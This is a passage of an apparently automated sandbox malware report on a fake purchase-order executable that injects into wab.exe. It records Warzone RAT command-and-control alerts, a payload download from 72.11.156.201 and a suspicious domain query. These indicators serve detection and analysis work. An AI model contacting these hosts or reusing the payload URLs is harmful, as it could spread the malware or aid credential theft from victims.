0000000D.00000003.1842736291.0000000021BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819029510.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818954283.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492817403.000000006FE89000.00000002.00000001.01000000.0000000B.sdmp, wab.exe, 0000000D.00000003.1824994886.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1825691579.0000000021882000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1832273738.0000000021AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe,
          Source: Binary string: wab.pdbGCTL source: wab.exe, 0000000D.00000002.2488865589.000000002073C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489099140.0000000020BC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817480011.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2491846197.000000006D57F000.00000002.00000001.01000000.0000000E.sdmp, wab.exe, 0000000D.00000003.1817722969.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817541628.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845212265.0000000004F78000.00000004.00000020.00020000.0
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: wab.exe, 0000000D.00000003.1809268507.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489782030.0000000021509000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809482259.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489600297.000000002135E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809717244.0000000021475000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809608585.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489686837.00000000213E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wab.pdb source: wab.exe, 0000000D.00000002.2488865589.000000002073C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489099140.0000000020BC3000.00000004.00000020.00020000.00000000.sdmp

          Spreading

          barindex
          Source: Yara matchFile source: 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_00406435 FindFirstFileA,FindClose,0_2_00406435
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_00405889 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405889
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1

          Networking

          barindex
          Source: TrafficSnort IDS: 2852346 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 31.192.107.180:78 -> 192.168.2.10:56372
          Source: TrafficSnort IDS: 2852347 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.10:56372 -> 31.192.107.180:78
          Source: TrafficSnort IDS: 2852350 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand 31.192.107.180:78 -> 192.168.2.10:56372
          Source: TrafficSnort IDS: 2852355 ETPRO TROJAN Ave Maria/Warzone RAT VNCGetModule 192.168.2.10:56372 -> 31.192.107.180:78
          Source: TrafficSnort IDS: 2852352 ETPRO TROJAN Ave Maria/Warzone RAT DownloadAndExecuteCommand 192.168.2.10:56372 -> 31.192.107.180:78
          Source: TrafficSnort IDS: 2839089 ETPRO TROJAN Ave Maria RAT Encrypted CnC Checkin (2) 192.168.2.10:56372 -> 31.192.107.180:78
          Source: TrafficSnort IDS: 2852354 ETPRO TROJAN Ave Maria/Warzone RAT RemoteModuleLoadResponse 31.192.107.180:78 -> 192.168.2.10:56372
          Source: Yara matchFile source: 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: global trafficTCP traffic: 192.168.2.10:56372 -> 31.192.107.180:78
          Source: Joe Sandbox ViewASN Name: NCONNECT-ASRU NCONNECT-ASRU
          Source: global trafficHTTP traffic detected: GET /VyNLorvhdmohGewWLK21.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 72.11.156.201Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: unknownTCP traffic detected without corresponding DNS query: 72.11.156.201
          Source: global trafficHTTP traffic detected: GET /VyNLorvhdmohGewWLK21.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 72.11.156.201Cache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: mad.pzg-peru.com
          Source: wab.exe, 0000000D.00000002.2474135498.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474590591.0000000005170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://72.11.156.201/VyNLorvhdmohGewWLK21.bin
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
